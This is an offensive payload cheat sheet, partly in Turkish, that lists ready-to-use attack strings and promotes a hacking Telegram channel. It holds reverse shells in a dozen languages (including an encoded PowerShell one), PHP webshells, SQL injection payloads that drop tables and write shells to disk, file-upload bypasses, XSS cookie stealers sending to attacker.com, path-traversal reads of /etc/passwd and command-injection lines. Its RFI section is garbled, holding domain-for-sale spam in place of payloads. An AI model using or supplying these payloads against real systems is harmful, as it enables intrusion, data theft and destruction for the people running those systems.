-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🧨 SHELL & PAYLOAD ARŞİVİ
🐚 1. REVERSE SHELL KODLARI
Bash
bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash
exec 5<>/dev/tcp/10.0.0.1/8080; cat <&5 | while read line; do $line 2>&5 >&5; done
Netcat
bashnc -e /bin/sh 10.0.0.1 8080
bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
Python
pythonpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python
export RHOST="10.0.0.1";export RPORT=8080;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
PHP
php<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'"); ?>
php
<?php system("nc -e /bin/sh 10.0.0.1 8080"); ?>
php
<?php $sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Perl
perlperl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
rubyruby -rsocket -e 'c=TCPSocket.new("10.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
PowerShell (Windows)
powershellpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMAAuADAALgAxACIALAA4ADAAOAAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAW11dACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgAgAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAaABhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
Java
javar = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5|while read line;do $line 2>&5 >&5;done"] as String[])
p.waitFor()
Node.js
javascriptrequire('child_process').exec('bash -c "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"')
Golang
goecho 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/shell.go && go run /tmp/shell.go
Telnet
bashtelnet 10.0.0.1 8080 | /bin/sh | telnet 10.0.0.1 8081
AWK
bashawk 'BEGIN{s="/inet/tcp/0/10.0.0.1/8080";while(1){s|&getline c;close(s);system(c)}}'
Socat
bashsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:8080
Xterm
bashxterm -display 10.0.0.1:0
PHP (Webshell)
php<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
php
<?php system($_GET['c']); ?>
php
<?php echo shell_exec($_GET['c']); ?>
php
<?php passthru($_GET['c']); ?>
php
<?php $sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");?>
🐍 2. SQL PAYLOAD (SQL INJECTION)
Union Based
sql' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION SELECT 1,2,table_name FROM information_schema.tables--
' UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users'--
Error Based
sql' AND extractvalue(1,concat(0x7e,database()))--
' AND updatexml(1,concat(0x7e,database()),1)--
' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
Boolean Based
sql' AND 1=1--
' AND 1=2--
' OR '1'='1'--
' OR 1=1--
' OR 1=1-- -
' OR 1=1#
' OR 1=1/*
Time Based
sql' AND SLEEP(5)--
' OR SLEEP(5)--
' AND BENCHMARK(10000000,MD5(1))--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
Stacked Queries
sql'; DROP TABLE users;--
'; INSERT INTO admin VALUES('hacker','pass');--
'; UPDATE users SET password='hacked' WHERE username='admin';--
'; SELECT * INTO OUTFILE '/var/www/shell.php' FROM (SELECT '<?php system($_GET[c]);?>')a;--
WAF Bypass Payloads
sql/*!UNION*/ /*!SELECT*/ 1,2,3--
'/**/UNION/**/SELECT/**/1,2,3--
'%20union%20select%201,2,3--
'%2527union%2520select%25201,2,3--
'||'1'||'='||'1
'||1=1--
'+or+1=1--
'+and+1=1--
' anD 1=1--
' aNd 1=2--
' XOR 1=1--
' XOR 1=2--
'/**/or/**/1=1--
'/**/and/**/1=1--
Database Specific
sql# MySQL
' UNION SELECT @@version,2,3--
' UNION SELECT user(),2,3--
# PostgreSQL
' UNION SELECT version(),2,3--
' UNION SELECT current_user,2,3--
# MSSQL
' UNION SELECT @@version,2,3--
' UNION SELECT system_user,2,3--
# Oracle
' UNION SELECT banner,2,3 FROM v$version--
' UNION SELECT username,2,3 FROM all_users--
💀 3. UPLOAD SHELL (File Upload Bypass)
PHP Shell
php<?php system($_GET['c']); ?>
php
<?php eval($_POST['c']); ?>
php
<?php assert($_POST['c']); ?>
php
<?php file_put_contents('shell.php','<?php system($_GET["c"]);?>'); ?>
Bypass Uzantı
textshell.php.jpg
shell.php;.jpg
shell.php%00.jpg
shell.php.jpeg
shell.php.png
shell.php.gif
shell.php.asp
shell.aspx.jpg
Bypass Magic Bytes
textGIF89a;
<?php system($_GET['c']); ?>
text
%PNG
<?php system($_GET['c']); ?>
text
ÿØÿà JFIF
<?php system($_GET['c']); ?>
.htaccess Shell
apacheAddType application/x-httpd-php .jpg
apache
php_value auto_append_file shell.jpg
🔥 4. XSS PAYLOAD
Basic
javascript<script>alert(1)</script>
html
<img src=x onerror=alert(1)>
html
<svg onload=alert(1)>
html
<body onload=alert(1)>
html
<input onfocus=alert(1) autofocus>
WAF Bypass
javascript<ScRiPt>alert(1)</sCrIpT>
javascript
<img src=x onerror=alert(1)>
javascript
<img src=x onerror=alert(1)>
javascript
<svg/onload=alert(1)>
javascript
<iframe src=javascript:alert(1)>
Cookie Stealer
javascript<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
html
<img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">
🎯 5. LFI/RFI PAYLOAD
LFI Basic
text../../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
Wrapper
textphp://filter/convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=index.php
expect://id
file:///etc/passwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
zip://shell.jpg%23shell.php
RFI
textAttacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
🔓 6. COMMAND INJECTION
Basic
bash; id
| id
|| id
& id
&& id
`id`
$(id)
WAF Bypass
bash%0aid
%0aid%0a
%0aid%0a%0a
%0Aid%0A
%0aid%0a%23
%0Aid%0A%23
;${IFS}id
;${IFS}id${IFS}
Reverse Shell
bash; nc -e /bin/sh 10.0.0.1 8080
; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
